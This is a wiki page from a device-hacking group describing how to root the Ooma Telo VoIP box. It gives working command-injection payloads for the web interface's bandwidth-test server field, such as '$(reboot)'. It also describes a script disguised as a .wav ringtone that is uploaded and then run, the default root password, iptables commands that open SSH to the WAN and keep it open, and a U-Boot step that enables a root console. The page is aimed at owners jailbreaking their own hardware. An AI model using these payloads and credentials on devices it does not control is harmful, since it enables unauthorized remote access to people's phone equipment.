Ooma Telo

From Exploitee.rs
Revision as of 21:19, 9 May 2015 by Trips (talk | contribs) (Added new serial exploit)
Jump to navigationJump to search

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."

Ooma Telo.jpg

This page will be dedicated to a general overview, descriptions, and information related to the Ooma Telo.

Purchase

Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the Ooma Telo at Amazon

GPL

You can find GPL code for the Ooma Telo​​ Here

Disassembly

UART

Exploiting the Ooma Web Interface (iPerf)

  • In order to access the Ooma Telo panel web interface you must either be plugged into the "LAN" port on the back of the device OR have the "remote administration" checkbox checked in the Ooma web interface panel.

Option 1

  1. Visit the Ooma web interface (The default IP for the LAN side is [1])
  2. In the left menu panel click "Tools"
  3. In the left panel click "Bandwidth"
  4. In the server field you can enter in any in the following syntax
    a.com$(COMMANDHERE)
  5. Click "Run Test"

Option 2

  1. Download OomaPwn.zip
  2. Visit the Ooma web interface (The default IP for the LAN side is [2])
  3. Go to Ringtones and upload both .wav files from downloaded OomaPwn.zip
  4. Navigate to Tools -> Bandwidth
  5. Enter the following one at a time into the Server IP Address
    Note: It will report an error, this is normal.
    $(chmod 755 /media/ringtone/*pwn.wav)
    $(/bin/sh /media/ringtone/*pwn.wav)
  6. When the script is done the Ooma unit will reboot
  7. You now have SSH access to the unit. root password is !ooma123

Demo

Dropbear SSHD

The default credentials for the Ooma Telo are:

Username: root

Password: !ooma123

Dropbear runs on kernel boot by default but is blocked by iptable rules.

IPTable Rules

Remote command execution through iperf screen hostname:

x.com$(reboot)

Enable LAN SSH

x.com$(iptables -t filter -A LAN_SSH -j ACCEPT)

Enable SSH on WAN

x.com$(iptables -t filter -I FireWall 1 -p tcp --destination-port 22 -j ACCEPT)

Permanently edit iptables rule (till next update)

mount -o,remount -rw -t ubifs ubi0:rootfsa /
echo -e "\n#Add sshd server\niptables -t filter -I FireWall 1 -p tcp --destination-port 22 -j ACCEPT" >>  /etc/ip_table.rules
mount -o,remount -r -t ubifs ubi0:rootfsa /

Enable Console from U-Boot

In newer Ooma firmwares, serial is disabled by default. A root prompt can be triggered by creating a UBI partition with the name of serial.

From the U-Boot console, enter the following:

run ubipart; ubi create serial 128; reset;

This also works on the newer Ooma Telo hardware. Shoutout to Trips for finding this.